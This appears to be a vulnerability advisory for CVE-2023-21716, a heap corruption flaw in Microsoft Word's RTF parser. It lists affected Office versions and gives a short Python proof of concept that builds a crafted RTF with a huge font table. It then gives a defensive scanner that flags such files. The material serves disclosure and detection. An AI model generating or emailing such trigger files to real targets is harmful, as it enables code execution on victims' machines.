CVE-2023-21716 (Microsoft Word RCE)

CNA: Microsoft Corporation (more like telemetry corporation)

Base Score: 9.8 CRITICAL

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Brief

This is a heap corruption vulnerability in Microsoft Word’s RTF parser. A crafted RTF file that triggers it allows attackers to achieve remote code execution with the privileges of the victim.

The flaw does not require prior authentication: attackers can simply send a booby-trapped RTF file to the victim(s) via email.

Details

Affected products

  • Microsoft Office 365 (Insider Preview - 2211 Build 15831.20122 CTR)

  • Microsoft Office 2016 (Including Insider Slow - 1704 Build 8067.2032 CTR)

  • Microsoft Office 2013

  • Microsoft Office 2010

  • Microsoft Office 2007

  • Older versions may also be affected but were not tested. Furthermore, the technical details of this vulnerability have evolved over the years.

Mitigations

PoC

# Builds an RTF whose font table declares 32761 font entries; the oversized
# font table is what triggers the heap corruption in Word's RTF parser.
fonts = "".join("{\\f%dA;}\n" % i for i in range(0, 32761))
rtf = "{\\rtf1{\n{\\fonttbl" + fonts + "}\n{\\rtlch no crash??}\n}}\n"
with open("exploit.rtf", "wb") as fh:
    fh.write(rtf.encode("utf-8"))

With email sent
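Since the trigger is an implausibly large \fonttbl group, a mail gateway or sandbox can flag such files before Word ever parses them. The scanner below is an added example, not code from the original page or from Microsoft; the threshold of 1024 fonts is an assumed heuristic (legitimate documents declare a few dozen fonts at most), and the sample inputs in the test are constructed.

```python
import re
import sys

# Assumed heuristic threshold: real documents declare a few dozen fonts at
# most, while the public PoC declares tens of thousands.
SUSPICIOUS_FONT_COUNT = 1024

# \f<digits> inside the font table is a font-number control word. \fswiss,
# \fcharset0 or \fs24 do not match because a letter follows the 'f'.
FONT_NUMBER = re.compile(rb"\\f(\d+)")


def fonttbl_span(data: bytes):
    """Return (start, end) byte offsets of the {\\fonttbl ...} group, or None.

    Braces are matched by hand, and \\{ \\} \\\\ escapes are skipped so an
    escaped brace inside a font name does not unbalance the count. An
    unterminated group (truncated or malformed file) runs to end of data.
    """
    idx = data.find(b"\\fonttbl")
    if idx < 0:
        return None
    start = data.rfind(b"{", 0, idx)
    if start < 0:
        return None  # no enclosing group: not a well-formed font table
    depth, i = 0, start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            i += 2  # skip the escaped character
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return start, i + 1
        i += 1
    return start, len(data)


def count_fonts(data: bytes) -> int:
    """Count font-number control words inside the font table (0 if none)."""
    span = fonttbl_span(data)
    if span is None:
        return 0
    return len(FONT_NUMBER.findall(data[span[0]:span[1]]))


def is_suspicious(data: bytes, threshold: int = SUSPICIOUS_FONT_COUNT) -> bool:
    """Flag RTF data whose font table is implausibly large."""
    return count_fonts(data) >= threshold


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            blob = fh.read()
        print(f"{path}: {count_fonts(blob)} fonts, suspicious={is_suspicious(blob)}")
```

Run it as `python rtf_fonttbl_check.py file.rtf` (file name assumed); a hit should route the attachment to a sandbox or quarantine rather than to the user's inbox.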
